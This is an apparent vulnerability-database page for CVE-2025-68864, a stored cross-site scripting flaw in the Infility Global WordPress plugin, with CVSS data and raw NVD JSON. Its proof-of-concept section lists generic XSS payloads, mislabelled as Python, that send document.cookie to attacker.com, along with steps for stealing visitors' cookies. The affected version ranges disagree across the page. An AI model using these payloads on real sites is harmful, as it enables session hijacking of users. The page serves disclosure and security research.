Security Vulnerability Report
中文
CVE-2025-68864 CVSS 7.1 HIGH

CVE-2025-68864

Published: 2026-01-22 17:16:12
Last Modified: 2026-04-28 19:36:03

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS.This issue affects Infility Global: from n/a through <= 2.15.11.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Infility Global <= 2.15.11

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-68864 Stored XSS PoC --> <!-- Payload: Inject malicious script in vulnerable input fields --> <!-- Basic XSS Payload --> <script>alert(document.cookie)</script> <!-- Image tag XSS --> <img src=x onerror=this.src='https://attacker.com/log?cookie='+document.cookie> <!-- SVG XSS --> <svg onload=fetch('https://attacker.com/steal?data='+btoa(document.cookie))> <!-- Event Handler XSS --> <body onload=eval(atob('YWxlcnQoJ1hTUyBBdHRhY2snKQ=='))> <!-- PoC Explanation --> <!-- 1. Identify input fields in Infility Global plugin (forms, comments, profile fields) --> <!-- 2. Inject XSS payload in any input field --> <!-- 3. Save/submit the form --> <!-- 4. Payload stored in database and executed when page is viewed --> <!-- 5. Attacker receives victim's cookies via external endpoint -->

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-68864", "sourceIdentifier": "[email protected]", "published": "2026-01-22T17:16:12.037", "lastModified": "2026-04-28T19:36:02.540", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Infility Infility Global infility-global allows Stored XSS.This issue affects Infility Global: from n/a through <= 2.15.11."}, {"lang": "es", "value": "Neutralización Incorrecta de Entrada Durante la Generación de Páginas Web ('cross-site scripting') vulnerabilidad en Infility Infility Global infility-global permite XSS Almacenado. Este problema afecta a Infility Global: desde n/a hasta &lt;= 2.14.50."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/infility-global/vulnerability/wordpress-infility-global-plugin-2-14-49-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}